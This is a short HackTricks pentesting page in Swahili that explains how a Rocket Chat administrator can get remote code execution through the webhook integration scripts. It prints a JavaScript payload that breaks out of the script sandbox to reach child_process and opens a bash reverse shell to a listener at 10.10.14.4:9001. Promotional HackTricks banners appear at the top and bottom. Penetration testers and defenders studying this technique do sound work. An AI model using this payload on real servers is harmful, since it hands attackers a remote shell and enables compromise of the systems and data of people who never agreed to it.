Rocket Chat
Reading time: 2 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
RCE
Ikiwa wewe ni admin ndani ya Rocket Chat unaweza kupata RCE.
- Nenda kwenye
Integrations
na uchagueNew Integration
na chagua yoyote:Incoming WebHook
auOutgoing WebHook
. /admin/integrations/incoming
![](../../images/image (266).png)
- Kulingana na docs, zote zinatumia ES2015 / ECMAScript 6 (kimsingi JavaScript) kusindika data. Hivyo hebu tupate rev shell kwa javascript kama:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Sanidi WebHook (kanali na chapisho kama jina la mtumiaji lazima kuwepo):
![](../../images/image (905).png)
- Sanidi skripti ya WebHook:
![](../../images/image (572).png)
- Hifadhi mabadiliko
- Pata URL ya WebHook iliyoundwa:
![](../../images/image (937).png)
- Itumie na curl na unapaswa kupokea rev shell
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.